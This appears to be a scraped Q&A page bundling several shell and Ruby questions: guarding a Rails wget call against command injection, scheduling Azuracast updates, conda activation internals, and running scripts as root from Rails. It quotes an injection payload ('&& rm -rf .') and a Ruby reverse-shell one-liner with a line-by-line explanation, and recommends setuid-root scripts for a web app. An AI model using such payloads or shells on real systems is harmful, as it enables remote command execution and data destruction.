Prevent injection via URL input - ruby-on-rails

In my Rails controller, I take a URL that the user inputs and runs the system command wget:
system("wget #{url}")
I'm afraid that the user might put in something like www.google.com && rm -rf ., which would make the controller execute the command
system("wget www.google.com && rm -rf .")
which deletes everything. How should I prevent against this kind of attacks? I'm not sure what other things the user could put in to harm my system.

Per this thread:
You can avoid shell expansion by passing arguments to the script individually:
system("/bin/wget", params[:url])
Per the documentation on Kernel#system this form does not invoke a shell. Constructs like && are shell constructs, so if you use this form, then the param will be passed to /bin/wget literally as an argument.
That said, still be suspicious of input, sanitize where possible, and if feasible, run it as a non-privileged (or better yet, jailed) user.

Joining commands together with && (or ;, or |) is a shell feature, not something that wget itself understands. If you're using a function that passes a command line to a shell (such as the system() function in many languages), you're at risk. If you execute the wget program directly (rather than executing a shell and giving it a command line), you won't be at risk of that particular attack.
However, the attacker could still do other things, like abuse wget's -O option to overwrite files. You'd be better off not using wget at all — if your goal is to download a file, why not just use an HTTP library to do it directly in your own program's code?

If all you want to do is to just retrieve the content of the URL, it is better to completely avoid the use of 'system' or any other means of running a command on the server.
You can use an http client such as Httparty to fetch the URL content.
response = HTTParty.get("#{url}")

Related

Script to automate timeshift backup and azuracast update

I’m running an Azuracast docker instance on Linode and want to try to find a way to automate my updates. Right now my routine is when I notice there are updates by accessing the Azuracast web panel, I usually run timeshift to create a backup using the following command
timeshift —-create —-comment “azuracast update ”
And then I use the following to update azuracast
cd /var/azuracast/
./docker.sh update-self
./docker.sh update
Then it asks me to ensure the azuracast installation is backed up before updating, to which i would usually just press enter.
After that is completed, it asks me if i want to clean up all stopped docker containers and images to save space, which i usually say no to.
What I’m wondering is if there is a way to create a bash script, or python or something to automate all of this, and then have it run on a schedule?
Sure, you can write a shell script to execute these commands and then run it on a schedule using crontab(5).
For example your script might look like:
#! /bin/sh
# Backup azuracast and restart docker container
timeshift --create --comment “azuracast update” && \
cd /var/azuracast/ && \
./docker.sh update-self && \
(yes | ./docker.sh update)
It sounds like this docker.sh program takes some user inputs. See if there are options you can pass to it that will allow you to run it non-interactively. (Seems there isn't, see edit.)
To setup your cron job, you can put the script in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly. Or if you need more control, you can get started configuring a cron job with crontab -e. Better explanation.
EDIT: Assuming this is the script you're using, it doesn't seem to have a way to run update non-interactively. Fear not though, there's a program for this: yes(1). This will answer yes to both of the questions, but honestly running docker system prune -f is probably a good idea. If you really want to answer no to that, you could probably substitute yes for printf "y\nn" to answer yes to the first and no to the second.
Also note that there's at least one other y/n question it could ask you, which you probably want to answer yes to.

Ruby one-liner breakdown?

I'm new to Ruby and trying to better understand this reverse shell one-liner designed to connect back to a Netcat listener.
Can someone try breaking the command down and explaining what some of the code actually does? For example, I know "TCPSocket.new" creates the new TCP socket, but what's "cmd=c.gets", "IO.popen", "|io|c.print io.read", etc. And what is the purpose of the while loop?
ruby -rsocket -e "c=TCPSocket.new('<IP Address>','<Port>');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
OK, let's break this one down.
ruby
runs the ruby interpreter, you likely knew that part
-rsocket
does the equivalent of require "socket" (r for require)
-e "some string"
run some string as a ruby script (e for execute)
while(cmd=c.gets)
is saying "while gets (get string up to and including the next newline) returns something from the connection c, i.e. while there's data coming in, assign it to cmd and..
IO.popen(cmd,'r'){|io|c.print io.read}
.. run cmd as a shell command, read the output, and print it back onto the connection c.
So, effectively, receive a command (like ls . or rm -rf /) over the network, read it in, run it, take the output, and send it back. Keep doing so until the other side stops sending commands.
Because gets will block and wait for the next line to come in, this one-liner will sit there waiting until the connection is closed.
Probably don't want to let other people send commands down that connection, since it'll run whatever they send directly on your computer, though that's presumably what you mean by "reverse shell".

Conda: what happens when you activate an environment?

How does running source activate <env-name> update the $PATH variable? I've been looking in the CONDA-INSTALLATION/bin/activate script and do not understand how conda updates my $PATH variable to include the bin directory for the recently activated environment. No where can I find the code that conda uses to prepend my $PATH variable.
Disclaimer: I am not a conda developer, and I'm not a Bash expert. The following explanation is based on me tracing through the code, and I hope I got it all right. Also, all of the links below are permalinks to the master commit at the time of writing this answer (7cb5f66). Behavior/lines may change in future commits. Beware: Deep rabbit hole ahead!
Note that this explanation is for the command source activate env-name, but in conda>=4.4, the recommended way to activate an environment is conda activate env-name. I think if one uses conda activate env-name, you should pick up the explanation around the part where we get into the cli.main function.
For conda >=4.4,<4.5, looking at CONDA_INST_DIR/bin/activate, we find on the second to last and last lines (GitHub link):
. "$_CONDA_ROOT/etc/profile.d/conda.sh" || return $?
_conda_activate "$#"
The first line sources the script conda.sh in the $_CONDA_ROOT/etc/profile.d directory, and that script defins the _conda_activate bash function, to which we pass the arguments $# which is basically all of the arguments that we passed to the activate script.
Taking the next step down the rabbit hole, we look at $_CONDA_ROOT/etc/profile.d/conda.sh and find (GitHub link):
_conda_activate() {
# Some code removed...
local ask_conda
ask_conda="$(PS1="$PS1" $_CONDA_EXE shell.posix activate "$#")" || return $?
eval "$ask_conda"
_conda_hashr
}
The key is that line ask_conda=..., and particularly $_CONDA_EXE shell.posix activate "$#". Here, we are running the conda executable with the arguments shell.posix, activate, and then the rest of the arguments that got passed to this function (i.e., the environment name that we want to activate).
Another step into the rabbit hole... From here, the conda executable calls the cli.main function and since the first argument starts with shell., it imports the main function from conda.activate. This function creates an instance of the Activator class (defined in the same file) and runs the execute method.
The execute method processes the arguments and stores the passed environment name into an instance variable, then decides that the activate command has been passed, so it runs the activate method.
Another step into the rabbit hole... The activate method calls the build_activate method, which calls another function to process the environment name to find the environment prefix (i.e., which folder the environment is in). Finally, the build_activate method adds the prefix to the PATH via the _add_prefix_to_path method. Finally, the build_activate method returns a dictionary of commands that need to be run to "activate" the environment.
And another step deeper... The dictionary returned from the build_activate method gets processed into shell commands by the _yield_commands method, which are passed into the _finalize method. The activate method returns the value from running the _finalize method which returns the name of a temp file. The temp file has the commands required to set all of the appropriate environment variables.
Now, stepping back out, in the activate.main function, the return value of the execute method (i.e., the name of the temp file) is printed to stdout. This temp file name gets stored in the Bash variable ask_conda back in the _conda_activate Bash function, and finally, the temp file is executed by the eval Bash function.
Phew! I hope I got everything right. As I said, I'm not a conda developer, and far from a Bash expert, so please excuse any explanation shortcuts I took that aren't 100% correct. Just leave a comment, I'll be happy to fix it!
I should also note that the recommended method to activate environments in conda >=4.4 is conda activate env-name, which is one of the reasons this is so convoluted - the activation is mostly handled in Python now, whereas (I think) previously it was more-or-less handled directly in Bash/CMD.

Optimizing Rails loading for maintenance scripts

I wrote a script that does maintenance tasks for a rails application. The script uses a class that uses models defined in the application. Just an example, let's say application defines model User, and my class (used within the script), sends messages to it, like User.find id.
I am looking for ways to optimize this script, because right now it has to load the application environment: require '../config/environment'. This takes ~15 seconds.
Had the script not use application codebase to do its job, I could have replaced model abstractions with raw SQL. But unfortunatly I can't do that because I would have to repeat the code in the script that is already present in the codebase. Not only would this violate DRY principle and require alot of work, the script would not be very maintainable, in case the model methods that I am using change.
I would like to hear ideas how to approach this problem. The script is not run from the application itself, but from the shell (with Capistrano for instance).
I hope I've described the problem clear enough. Thank you.
Could you write a little daemon that is in a read on a pipe (or named fifo, or unix domain socket, or, with more complexity, a tcp port) that accepts 'commands' that would be run on your database?
#!/usr/bin/ruby
require '../config/environment'
while (true) do
File.open("/tmp/fifo", "r") do |f|
f.each_line do |line|
case line
when "cleanup" then puts "clean!"
when "publish" then puts "published!"
else puts "invalid command, ignoring"
end
end
end
end
You could start this thing up with vixie cron's #reboot specifier, or you could run it via capistrano commands, or run it out of init or init scripts. Then you write your capistrano rules (that you have now) to simply echo commands into the fifo:
First,
mkfifo /tmp/fifo
In one terminal:
$ ./env.rb
In another terminal:
$ echo -n "cleanup" > /tmp/fifo
$ echo -n "publish" > /tmp/fifo
$ echo -n "go away" > /tmp/fifo
The output in the first terminal looks like this:
clean!
published!
invalid command, ignoring
You could make the matching as friendly (perhaps allow plain echo, rather than require echo -n as my example does) or unfriendly as you want. And the commands that get run can of course call into your model files to do their work.
Please make sure you choose a good location for your fifo -- /tmp/ is probably a bad place, as many distributions clear it on reboot. Also make sure you set the fifo owner and permission (chown and chmod) appropriately for your application -- you might not want to allow your Firefox's flash plugin to write to this file and command your database.

Ruby on Rails- how to run a bash script as root?

What I'm wanting to do is use 'button_to' & friends to start different scripts on a linux server. Not all scripts will need to be root, but some will, since they'll be running "apt-get dist-upgrade" and such.
The PassengerDefaultUser is set to www-data in apache2.conf
I have already tried running scripts from the controller that do little things like writing to text files, etc, just so that I know that I am having Rails execute the script correctly. (in other words, I know how to run a script from the controller) But I cannot figure out how to run a script that requires root access. Can anyone give me a lead?
A note on security: Thanks for all the warnings against hacking that were given. You don't need to loose any sleep, though, because A) the webapp is not accessible from the public internet, it will only be on private intranets, B) the app is password protected, and C) because the user will not be able to supply custom input, only make selections from a form that will be passed as variables to the script. However, because I say this does not mean that I am disregarding your recommendations for security- I will be considering them very carefully in my design.
You should be using the setuid bit to achieve the same functionality without sudo. But you shouldn't be running Bash scripts. Setuid is much more secure than sudo. Using either sudo or setuid, you are running a program as root. But only setuid (with the help of certain languages) offers some added security measures.
Essentially you'll be using scripts that are temporarily allowed to run as a the owner, instead of the user that invoked them. Ruby and Perl can detect when a script is run as a different user than the caller and enforces security measures to protect against unsafe calls. This is called Taint mode. Bash does not run in taint mode at all.
Taint mode essentially works by declaring all input from an outside source unsafe for use when passed to a system call.
Setting it up:
Use chmod to set permissions on the script you want to run as 4755 and set it's owner to root:
$ chmod 4755 script.rb
$ chown root script.rb
Then just run the script as you normally would. The setuid bit kicks in and runs the script as if it was run by root. This is the safest way to temporarily elevate privileges.
See Ruby's documentation on safe levels and taint to understand Ruby's sanitation requirements to protect against tainted input causing harm. Or the perlsec faq to learn the how the same thing is done in Perl.
Again. If you're dead set on running scripts as root from an automated system. Do Not Use Bash! Use Ruby or Perl instead of Bash. Taint mode forces you to take security seriously and can avoid many unnecessary problems down the line.

Resources